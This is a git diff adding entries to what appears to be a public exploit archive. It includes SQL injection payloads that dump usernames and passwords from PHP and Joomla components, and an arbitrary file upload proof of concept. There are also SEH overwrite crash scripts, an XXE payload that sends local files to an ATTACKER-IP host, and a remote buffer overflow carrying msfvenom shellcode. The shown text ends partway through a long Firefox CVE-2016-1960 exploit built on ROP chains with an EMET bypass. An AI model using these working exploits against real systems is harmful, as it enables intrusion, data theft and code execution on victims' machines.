+# 1'+/*!44444union*/+/*!44444select*/+1,2,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),4,5--+-
+# 1'+/*!44444union*/+/*!44444select*/+1,2,concat(username,0x3a,password),4,5+from+users--+-
+# 
+# http://localhost/[PATH]/Assignment.php?student_id=[SQL]
+# 7'and+(select+0x31+from (select+count(*),concat((select(select concat(cast(database() as char),0x7e))+from information_schema.tables+where table_schema=database()+limit 0,1),floor(rand(0)*2))x from+information_schema.tables+group+by+x)a)+AND ''='
+# 
+# http://localhost/[PATH]/Fee.php?pay&student_id=7&fee_id=[SQL]
+# 
+# http://localhost/[PATH]/YearBook.php?session_id=[SQL]
+# 
+# http://localhost/[PATH]/Transaction.php?invoice=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42500.txt b/platforms/php/webapps/42500.txt
new file mode 100755
index 000000000..36ba16196
--- /dev/null
+++ b/platforms/php/webapps/42500.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: https://zcontent.net/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/zap-calendar-lite/
+# Demo: http://demo.zapcalendar.com/
+# Version: 4.3.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=[SQL]
+# 1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42501.txt b/platforms/php/webapps/42501.txt
new file mode 100755
index 000000000..b68fd2209
--- /dev/null
+++ b/platforms/php/webapps/42501.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component Calendar Planner 1.0.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://joomlathat.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
+# Demo: http://demo.joomlathat.com/
+# Version: 1.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php/component/calendarplanner/events?searchword=&option=com_calendarplanner&view=events&category_id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42502.txt b/platforms/php/webapps/42502.txt
new file mode 100755
index 000000000..f8f80ad2c
--- /dev/null
+++ b/platforms/php/webapps/42502.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component SP Movie Database 1.3 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://joomshaper.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/sp-movie-database/
+# Demo: http://demo.joomshaper.com/2016/moview/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_spmoviedb&view=searchresults&searchword=[SQL]&type=movies&Itemid=523
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42504.txt b/platforms/php/webapps/42504.txt
new file mode 100755
index 000000000..f5929efb6
--- /dev/null
+++ b/platforms/php/webapps/42504.txt
@@ -0,0 +1,39 @@
+# # # # #
+# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://sarutech.com/
+# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
+# Demo: https://demo.sarutech.com/deworkshop/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....
+#
+# Vulnerable Source:
+# .....................
+# $eid = $_GET["id"];
+# ......
+# $folder = "img/users/";
+# $extention = strrchr($_FILES['bgimg']['name'], ".");
+# $bgimg = $_FILES['bgimg']['name'];
+# //$bgimg = $new_name.'.jpg';
+# $uploaddir = $folder . $bgimg;
+# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);
+# .....................
+# 	
+# Proof of Concept:
+# 
+# Customer profile picture arbitrary file can be uploaded ..
+# 
+# http://localhost/[PATH]/customerupdate.php?id=1
+# http://localhost/[PATH]/img/users/[FILE].php
+# 
+#####
\ No newline at end of file
diff --git a/platforms/windows/dos/42483.py b/platforms/windows/dos/42483.py
new file mode 100755
index 000000000..bfd987330
--- /dev/null
+++ b/platforms/windows/dos/42483.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python
+# Exploit Title     : MyDoomScanner1.00 Hostname/IP Field SEH Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Discovery Date    : 17/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/mydoomscanner.aspx
+# Tested Version    : 1.00
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows XP 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#0012FAF8   43434343
+#42424242   *** CORRUPT ENTRY ***
+ 
+# Offset to the SEH Frame is 536
+buffer = "A"*520
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/42486.py b/platforms/windows/dos/42486.py
new file mode 100755
index 000000000..c0cb53bca
--- /dev/null
+++ b/platforms/windows/dos/42486.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title     : DSScan v1.0 Hostname/IP Field SEH Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Website	    : http://pyramidcyber.com/
+# Discovery Date    : 18/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/dsscan.aspx#
+# Tested Version    : 1.00
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows 10 Home x64 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#0019F900   43434343
+#42424242   *** CORRUPT ENTRY ***
+
+ 
+# Offset to the SEH Frame is 560
+buffer = "A"*560
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/42495.py b/platforms/windows/dos/42495.py
new file mode 100755
index 000000000..c15b38369
--- /dev/null
+++ b/platforms/windows/dos/42495.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title     : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Discovery Date    : 18/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx#
+# Tested Version    : 1.05
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows 7 Ultimate x64bit 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#42424242   *** CORRUPT ENTRY ***
+
+ 
+# Offset to the SEH is 772
+buffer = "A"*772
+# Address to the Handler Code
+seh = "B"*4
+#Junk 
+junk = "C"*12
+# Address to the EIP
+eip = "D"*4
+f = open("evil.txt", "wb")
+f.write(buffer+seh+junk+eip)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/local/42000.txt b/platforms/windows/local/42000.txt
new file mode 100755
index 000000000..bcb134b65
--- /dev/null
+++ b/platforms/windows/local/42000.txt
@@ -0,0 +1,33 @@
+[+] Exploit Title: Dive Assistant - Template Builder XXE Injection
+[+] Date: 12-05-2017
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: http://www.blackwave.com/
+[+] Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx
+[+] Version: 8.0
+[+] Tested on: Windows 7 SP1, Windows 10
+[+] CVE: CVE-2017-8918
+
+1. Vulnerability Description
+
+Dive Assistant - Desktop Edition comes with a template builder .exe to create print templates.  The templates are saved and uploaded as XML files which are vulnerable to XXE injection.  Sending a crafted payload to a user, when opened in Dive Assistant - Template Builder, will return the content of any local files to a remote attacker.
+
+2. Proof of Concept
+
+a.) python -m SimpleHTTPServer 9999 (listening on attacker's IP and hosting payload.dtd)
+
+b.) Hosted "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:9999?%file;'>">
+
+%all;
+
+c.) Exploited "template.xml"
+
+<?xml version="1.0"?
+<!DOCTYPE exploit [
+<!ENTITY % file SYSTEM "C:\Windows\System.ini">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:9999?%file;'>">
+%dtd;]>
+<exploit>&send;</exploit>
\ No newline at end of file
diff --git a/platforms/windows/remote/42222.py b/platforms/windows/remote/42222.py
new file mode 100755
index 000000000..5ab233cef
--- /dev/null
+++ b/platforms/windows/remote/42222.py
@@ -0,0 +1,97 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        SpyCamLizard v1.230 Remote Buffer Overflow (SafeSEH Bypass)
+# Date:                 20-06-2017
+# Exploit Author:       @abatchy17 -- www.abatchy.com
+# Vulnerable Software:  SpyCamLizard
+# Vendor Homepage:      http://www.spycamlizard.com/
+# Version:              1.230
+# Software Link:        http://spycamlizard.com/SpyCamLInstaller.exe
+# Tested On:            WinXP SP3 x86
+#
+# Credit to ScrR1pTK1dd13 for discovering the PoC (41667).
+#
+##############################################################################
+
+import socket
+import sys
+
+host = "127.0.0.1"
+port = 80
+
+nSEH = "\xeb\x10\x90\x90"
+
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  Module info :
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  0x10000000 | 0x100d6000 | 0x000d6000 | False  | True    | False |  False   | False  | 1.0.0.1 [ZTcore.dll] (C:\Program Files\SpyCam Lizard\ZTcore.dll)
+#  0x00400000 | 0x006ea000 | 0x002ea000 | False  | False   | False |  False   | False  | 1.230 [SCLiz.exe] (C:\Program Files\SpyCam Lizard\SCLiz.exe)
+# -----------------------------------------------------------------------------------------------------------------------------------------
+# 
+# Sine 1) SCLiz.exe always has a null byte for any address, 2) partial overwrite didn't work and 3)ZTcore.dll had SafeSEH enabled, none of the addresses in these modules could be used.
+# Luckily the output of "!mona seh -all" contained this entry and seemed to always work for WinXP SP3 x86 (kinda awful being on heap but seems to work):
+# 0x01726017 : call dword ptr ss:[ebp-18] | ascii {PAGE_READWRITE} [Heap]
+# This won't work on later versions of Windows thanks to ASLR
+SEH = "\x17\x60\x72\x01"
+
+llamaleftovers = (
+    # Since we used call dword ptr ss:[ebp-18] instead of POP POP RET, we can POP 4 times to get the current location.
+    # Now EAX contains address of instruction jumped to right after executing call dword ptr ss:[ebp-18]
+    "\x58\x58\x58\x58"  
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = oldEAX + 0x100, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+)
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python
+# Payload size: 440 bytes
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x59\x6c\x6a\x48\x6f\x72\x57\x70\x77\x70\x75\x50\x71"
+buf += "\x70\x4d\x59\x79\x75\x66\x51\x6b\x70\x53\x54\x4e\x6b"
+buf += "\x30\x50\x66\x50\x6c\x4b\x76\x32\x34\x4c\x4c\x4b\x31"
+buf += "\x42\x77\x64\x6e\x6b\x51\x62\x75\x78\x66\x6f\x68\x37"
+buf += "\x52\x6a\x56\x46\x76\x51\x69\x6f\x6e\x4c\x37\x4c\x75"
+buf += "\x31\x73\x4c\x54\x42\x54\x6c\x51\x30\x4a\x61\x6a\x6f"
+buf += "\x36\x6d\x36\x61\x68\x47\x69\x72\x79\x62\x50\x52\x73"
+buf += "\x67\x6c\x4b\x32\x72\x56\x70\x4e\x6b\x30\x4a\x57\x4c"
+buf += "\x6e\x6b\x52\x6c\x46\x71\x44\x38\x59\x73\x30\x48\x47"
+buf += "\x71\x58\x51\x43\x61\x4e\x6b\x52\x79\x71\x30\x45\x51"
+buf += "\x48\x53\x4e\x6b\x67\x39\x44\x58\x79\x73\x54\x7a\x50"
+buf += "\x49\x6c\x4b\x65\x64\x4c\x4b\x76\x61\x39\x46\x44\x71"
+buf += "\x69\x6f\x6c\x6c\x4f\x31\x78\x4f\x56\x6d\x76\x61\x38"
+buf += "\x47\x44\x78\x79\x70\x51\x65\x6b\x46\x57\x73\x53\x4d"
+buf += "\x68\x78\x65\x6b\x73\x4d\x56\x44\x73\x45\x5a\x44\x70"
+buf += "\x58\x6e\x6b\x61\x48\x35\x74\x66\x61\x6b\x63\x30\x66"
+buf += "\x6c\x4b\x34\x4c\x70\x4b\x4e\x6b\x46\x38\x75\x4c\x63"
+buf += "\x31\x78\x53\x4c\x4b\x35\x54\x4e\x6b\x55\x51\x6e\x30"
+buf += "\x4d\x59\x77\x34\x44\x64\x74\x64\x31\x4b\x51\x4b\x70"
+buf += "\x61\x70\x59\x71\x4a\x42\x71\x39\x6f\x4b\x50\x53\x6f"
+buf += "\x71\x4f\x62\x7a\x4e\x6b\x35\x42\x6a\x4b\x6c\x4d\x63"
+buf += "\x6d\x73\x5a\x33\x31\x6e\x6d\x6c\x45\x58\x32\x45\x50"
+buf += "\x35\x50\x55\x50\x56\x30\x42\x48\x56\x51\x4e\x6b\x62"
+buf += "\x4f\x6e\x67\x49\x6f\x6e\x35\x4d\x6b\x4a\x50\x6f\x45"
+buf += "\x69\x32\x71\x46\x45\x38\x6e\x46\x6e\x75\x4f\x4d\x6f"
+buf += "\x6d\x69\x6f\x6b\x65\x67\x4c\x57\x76\x31\x6c\x46\x6a"
+buf += "\x4b\x30\x6b\x4b\x4d\x30\x70\x75\x75\x55\x4f\x4b\x71"
+buf += "\x57\x46\x73\x51\x62\x52\x4f\x51\x7a\x55\x50\x70\x53"
+buf += "\x59\x6f\x58\x55\x50\x63\x63\x51\x30\x6c\x72\x43\x74"
+buf += "\x6e\x65\x35\x44\x38\x71\x75\x33\x30\x41\x41"
+
+junk1 = "A" * 1173
+junk2 = "B"*16
+junk3 = "C"*213
+junk4 = "D"*3000
+
+exploit = junk1 + nSEH + SEH + junk2 + llamaleftovers + junk3 + buf + junk4
+
+httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+httpsocket.connect((host,port))
+httpsocket.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
+httpsocket.close()
diff --git a/platforms/windows/remote/42484.html b/platforms/windows/remote/42484.html
new file mode 100755
index 000000000..a4d8177bc
--- /dev/null
+++ b/platforms/windows/remote/42484.html
@@ -0,0 +1,1224 @@
+<!doctype html>
+<html>
+<head>
+<meta http-equiv="cache-control" content="no-cache" charset="utf-8" />
+<title>CVE-2016-1960</title>
+<script>
+/*
+ * Exploit Title: Mozilla Firefox < 45.0 nsHtml5TreeBuilder Array Indexing Vulnerability (EMET 5.52 bypass)
+ * Author: Hans Jerry Illikainen (exploit), ca0nguyen (vulnerability)
+ * Vendor Homepage: https://mozilla.org
+ * Software Link: https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/
+ * Version: 44.0.2
+ * Tested on: Windows 7 and Windows 10
+ * CVE: CVE-2016-1960
+ *
+ * Exploit for CVE-2016-1960 [1] targeting Firefox 44.0.2 [2] on WoW64
+ * with/without EMET 5.52.
+ *
+ * Tested on:
+ * - 64bit Windows 10 Pro+Home (version 1703)
+ * - 64bit Windows 7 Pro SP1
+ *
+ * Vulnerability disclosed by ca0nguyen [1].
+ * Exploit written by Hans Jerry Illikainen <hji@dyntopia.com>.
+ *
+ * [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
+ * [2] https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/
+ */
+
+"use strict";
+
+/* This is executed after having pivoted the stack.  `esp' points to a
+ * region on the heap, and the original stack pointer is stored in
+ * `edi'.  In order to bypass EMET, the shellcode should make sure to
+ * xchg edi, esp before any protected function is called.
+ *
+ * For convenience, the first two "arguments" to the shellcode is a
+ * module handle for kernel32.dll and the address of GetProcAddress() */
+const shellcode = [
+    "\x8b\x84\x24\x04\x00\x00\x00", /* mov eax, dword [esp + 0x4] */
+    "\x8b\x8c\x24\x08\x00\x00\x00", /* mov ecx, dword [esp + 0x8] */
+    "\x87\xe7",                     /* xchg edi, esp */
+    "\x56",                         /* push esi */
+    "\x57",                         /* push edi */
+    "\x89\xc6",                     /* mov esi, eax */
+    "\x89\xcf",                     /* mov edi, ecx */
+    "\x68\x78\x65\x63\x00",         /* push xec\0 */
+    "\x68\x57\x69\x6e\x45",         /* push WinE */
+    "\x54",                         /* push esp */
+    "\x56",                         /* push esi */
+    "\xff\xd7",                     /* call edi */
+    "\x83\xc4\x08",                 /* add esp, 0x8 */
+
+    "\x6a\x00",                     /* push 0 */
+    "\x68\x2e\x65\x78\x65",         /* push .exe */
+    "\x68\x63\x61\x6c\x63",         /* push calc */
+    "\x89\xe1",                     /* mov ecx, esp */
+    "\x6a\x01",                     /* push 1 */
+    "\x51",                         /* push ecx */
+    "\xff\xd0",                     /* call eax */
+    "\x83\xc4\x0c",                 /* add esp, 0xc */
+
+    "\x5f",                         /* pop edi */
+    "\x5e",                         /* pop esi */
+    "\x87\xe7",                     /* xchg edi, esp */
+    "\xc3",                         /* ret */
+];
+
+function ROPHelper(pe, rwx) {
+    this.pe = pe;
+    this.rwx = rwx;
+    this.cache = {};
+
+    this.search = function(instructions) {
+        for (let addr in this.cache) {
+            if (this.match(this.cache[addr], instructions) === true) {
+                return addr;
+            }
+        }
+
+        const text = this.pe.text;
+        for (let addr = text.base; addr < text.base + text.size; addr++) {
+            const read = this.rwx.readBytes(addr, instructions.length);
+            if (this.match(instructions, read) === true) {
+                this.cache[addr] = instructions;
+                return addr;
+            }
+        }
+
+        throw new Error("could not find gadgets for " + instructions);
+    };
+
+    this.match = function(a, b) {
+        if (a.length !== b.length) {
+            return false;
+        }
+
+        for (let i = 0; i < a.length; i++) {
+            if (a[i] !== b[i]) {
+                return false;
+            }
+        }
+        return true;
+    };
+
+    this.execute = function(func, args, cleanup) {
+        const u32array = this.rwx.u32array;
+        const ret = this.rwx.calloc(4);
+        let i = this.rwx.div.mem.idx + 2941; /* gadgets after [A] and [B] */
+
+        /*
+         * [A] stack pivot
+         *
+         * xchg eax, esp
+         * ret 0x2de8
+         */
+        const pivot = this.search([0x94, 0xc2, 0xe8, 0x2d]);
+
+        /*
+         * [B] preserve old esp in a nonvolatile register
+         *
+         * xchg eax, edi
+         * ret
+         */
+        const after = this.search([0x97, 0xc3]);
+
+        /*
+         * [C] address to execute
+         */
+        u32array[i++] = func;
+
+        if (cleanup === true && args.length > 0) {
+            if (args.length > 1) {
+                /*
+                 * [E] return address from [C]: cleanup args on the stack
+                 *
+                 * add esp, args.length*4
+                 * ret
+                 */
+                u32array[i++] = this.search([0x83, 0xc4, args.length*4, 0xc3]);
+            } else {
+                /*
+                 * [E] return address from [C]: cleanup arg
+                 *
+                 * pop ecx
+                 * ret
+                 */
+                u32array[i++] = this.search([0x59, 0xc3]);
+            }
+        } else {
+            /*
+             * [E] return address from [C]
+             *
+             * ret
+             */
+            u32array[i++] = this.search([0xc3]);
+        }
+
+        /*
+         * [D] arguments for [C]
+         */
+        for (let j = 0; j < args.length; j++) {
+            u32array[i++] = args[j];
+        }
+
+        /*
+         * [F] pop the location for the return value
+         *
+         * pop ecx
+         * ret
+         */
+        u32array[i++] = this.search([0x59, 0xc3]);
+
+        /*
+         * [G] address to store the return value
+         */
+        u32array[i++] = ret.addr;
+
+        /*
+         * [H] move the return value to [G]
+         *
+         * mov dword [ecx], eax
+         * ret
+         */
+        u32array[i++] = this.search([0x89, 0x01, 0xc3]);
+
+        /*
+         * [I] restore the original esp and return
+         *
+         * mov esp, edi
+         * ret
+         */
+        u32array[i++] = this.search([0x89, 0xfc, 0xc3]);
+
+        this.rwx.execute(pivot, after);
+
+        return u32array[ret.idx];
+    };
+}
+
+function ICUUC55(rop, pe, rwx) {
+    this.rop = rop;
+    this.pe = pe;
+    this.rwx = rwx;
+    this.kernel32 = new KERNEL32(rop, pe, rwx);
+    this.icuuc55handle = this.kernel32.GetModuleHandleA("icuuc55.dll");
+
+    /*
+     * The invocation of uprv_malloc_55() requires special care since
+     * pAlloc points to a protected function (VirtualAlloc).
+     *
+     * ROPHelper.execute() can't be used because:
+     * 1. it pivots the stack to the heap (StackPivot protection)
+     * 2. it returns into the specified function (Caller protection)
+     * 3. the forward ROP chain is based on returns (SimExecFlow protection)
+     *
+     * This function consist of several steps:
+     * 1. a second-stage ROP chain is written to the stack
+     * 2. a first-stage ROP chain is executed that pivots to the heap
+     * 3. the first-stage ROP chain continues by pivoting to #1
+     * 4. uprv_malloc_55() is invoked
+     * 5. the return value is saved
+     * 6. the original stack is restored
+     *
+     * Of note is that uprv_malloc_55() only takes a `size' argument,
+     * and it passes two arguments to the hijacked pAlloc function
+     * pointer (context and size; both in our control).  VirtualAlloc,
+     * on the other hand, expects four arguments.  So, we'll have to
+     * setup the stack so that the values interpreted by VirtualAlloc as
+     * its arguments are reasonably-looking.
+     *
+     * By the time that uprv_malloc_55() is returned into, the stack
+     * will look like:
+     * [A] [B] [C] [D]
+     *
+     * When pAlloc is entered, the stack will look like:
+     * [uprv_malloc_55()-ret] [pContext] [B] [A] [B] [C] [D]
+     *
+     * Since we've set pAlloc to point at VirtualAlloc, the call is
+     * interpreted as VirtualAlloc(pContext, B, A, B);
+     *
+     * Hence, because we want `flProtect' to be PAGE_EXECUTE_READWRITE,
+     * we also have to have a `size' with the same value; meaning our
+     * rwx allocation will only be 0x40 bytes.
+     *
+     * This is not a problem, since we can simply write a small snippet
+     * of shellcode that allocates a larger region in a non-ROPy way
+     * afterwards.
+     */
+    this.uprv_malloc_55 = function(stackAddr) {
+        const func = this.kernel32.GetProcAddress(this.icuuc55handle,
+                                                  "uprv_malloc_55");
+        const ret = this.rwx.calloc(4);
+        const u32array = this.rwx.u32array;
+
+        /**********************
+         * second stage gadgets
+         **********************/
+        const stackGadgets = new Array(
+            func,
+
+            0x1000,     /* [A] flAllocationType (MEM_COMMIT) */
+            0x40,       /* [B] dwSize and flProtect (PAGE_EXECUTE_READWRITE) */
+            0x41414141, /* [C] */
+            0x42424242, /* [D] */
+
+            /*
+             * location to write the return value
+             *
+             * pop ecx
+             * ret
+             */
+            this.rop.search([0x59, 0xc3]),
+            ret.addr,
+
+            /*
+             * do the write
+             *
+             * mov dword [ecx], eax
+             * ret
+             */
+            this.rop.search([0x89, 0x01, 0xc3]),
+
+            /*
+             * restore the old stack
+             *
+             * mov esp, edi
+             * ret
+             */
+            this.rop.search([0x89, 0xfc, 0xc3])
+        );
+
+        const origStack = this.rwx.readDWords(stackAddr, stackGadgets.length);
+        this.rwx.writeDWords(stackAddr, stackGadgets);
+
+
+        /*********************
+         * first stage gadgets
+         *********************/
+        /*
+         * pivot
+         *
+         * xchg eax, esp
+         * ret 0x2de8
+         */
+        const pivot = this.rop.search([0x94, 0xc2, 0xe8, 0x2d]);
+
+        /*
+         * preserve old esp in a nonvolatile register
+         *
+         * xchg eax, edi
+         * ret
+         */
+        const after = this.rop.search([0x97, 0xc3]);
+
+        /*
+         * pivot to the second stage
+         *
+         * pop esp
+         * ret
+         */
+        u32array[this.rwx.div.mem.idx + 2941] = this.rop.search([0x5c, 0xc3]);
+        u32array[this.rwx.div.mem.idx + 2942] = stackAddr;
+
+        /*
+         * here we go :)
+         */
+        this.rwx.execute(pivot, after);
+        this.rwx.writeDWords(stackAddr, origStack);
+
+        if (u32array[ret.idx] === 0) {
+            throw new Error("uprv_malloc_55() failed");
+        }
+        return u32array[ret.idx];
+    };
+
+    /*
+     * Overrides the pointers in firefox-44.0.2/intl/icu/source/common/cmemory.c
+     */
+    this.u_setMemoryFunctions_55 = function(context, a, r, f, status) {
+        const func = this.kernel32.GetProcAddress(this.icuuc55handle,
+                                                  "u_setMemoryFunctions_55");
+        this.rop.execute(func, [context, a, r, f, status], true);
+    };
+
+    /*
+     * Sets `pAlloc' to VirtualAlloc.  `pRealloc' and `pFree' are
+     * set to point to small gadgets.
+     */
+    this.set = function() {
+        const status = this.rwx.calloc(4);
+        const alloc = this.pe.search("kernel32.dll", "VirtualAlloc");
+
+        /* pretend to be a failed reallocation
+         *
+         * xor eax, eax
+         * ret */
+        const realloc = this.rop.search([0x33, 0xc0, 0xc3]);
+
+        /* let the chunk live
+         *
+         * ret */
+        const free = this.rop.search([0xc3]);
+
+        this.u_setMemoryFunctions_55(0, alloc, realloc, free, status.addr);
+        if (this.rwx.u32array[status.idx] !== 0) {
+            throw new Error("u_setMemoryFunctions_55() failed");
+        }
+    };
+
+    /*
+     * This (sort of) restores the functionality in
+     * intl/icu/source/common/cmemory.c by reusing the previously
+     * allocated PAGE_EXECUTE_READWRITE chunk to set up three stubs that
+     * invokes an appropriate function in mozglue.dll
+     */
+    this.reset = function(chunk) {
+        const u32array = this.rwx.u32array;
+        const status = this.rwx.calloc(4);
+
+        /*
+         * pFree
+         */
+        const free = {};
+        free.addr = chunk;
+        free.func = this.rwx.calloc(4);
+        free.func.str = this.dword2str(free.func.addr);
+        free.code = [
+            "\x8b\x84\x24\x08\x00\x00\x00", /* mov eax, dword [esp + 0x8] */
+            "\x50",                         /* push eax */
+            "\x8b\x05" + free.func.str,     /* mov eax, [location-of-free] */
+            "\xff\xd0",                     /* call eax */
+            "\x59",                         /* pop ecx */
+            "\xc3",                         /* ret */
+        ].join("");
+        u32array[free.func.idx] = this.pe.search("mozglue.dll", "free");
+        this.rwx.writeString(free.addr, free.code);
+
+        /*
+         * pAlloc
+         */
+        const alloc = {};
+        alloc.addr = chunk + free.code.length;
+        alloc.func = this.rwx.calloc(4);
+        alloc.func.str = this.dword2str(alloc.func.addr);
+        alloc.code = [
+            "\x8b\x84\x24\x08\x00\x00\x00", /* mov eax, dword [esp + 0x8] */
+            "\x50",                         /* push eax */
+            "\x8b\x05" + alloc.func.str,    /* mov eax, [location-of-alloc] */
+            "\xff\xd0",                     /* call eax */
+            "\x59",                         /* pop ecx */
+            "\xc3",                         /* ret */
+        ].join("");
+        u32array[alloc.func.idx] = this.pe.search("mozglue.dll", "malloc");
+        this.rwx.writeString(alloc.addr, alloc.code);
+
+        /*
+         * pRealloc
+         */
+        const realloc = {};
+        realloc.addr = chunk + free.code.length + alloc.code.length;
+        realloc.func = this.rwx.calloc(4);
+        realloc.func.str = this.dword2str(realloc.func.addr);
+        realloc.code = [
